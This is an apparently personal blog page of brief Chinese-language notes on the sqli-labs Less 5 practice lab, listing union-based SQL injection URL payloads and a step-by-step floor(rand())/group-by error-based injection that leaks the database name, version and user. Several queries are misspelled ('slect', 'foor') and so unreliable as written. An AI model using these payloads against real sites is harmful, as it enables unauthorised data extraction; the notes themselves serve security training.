zoukankan      html  css  js  c++  java
  • sqlilabs 5

    第一个1不断返回true,2可以进行更改
    ?id=-1' union select 1,2,3 and '1
    ?id=-1' union select 1,2,3 and 1='1

    ?id=-1' union select 1,@@datadir,3 and '1
    @@datadir可以替换为 current_user,database() etc..

    select rand();
    select foor();

    select table_name,table_schema from information_schema.tables group by table_schema;

    select database();
    slect(select database());
    slect concat (select database());
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a);
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

  • 相关阅读:
    php冒泡排序
    解决ubuntu下安装phpmyadmin访问不了的问题
    反省
    mysql主从复制
    ubuntu14.04 安装 bcm43142无线网卡
    mysql 批量更新和批量插入
    chromium 安装 pepper flash player
    js prototype新感悟
    读《乌合之众》
    马云---我的世界永不言败
  • 原文地址:https://www.cnblogs.com/CMlhc/p/8858973.html
Copyright © 2011-2022 走看看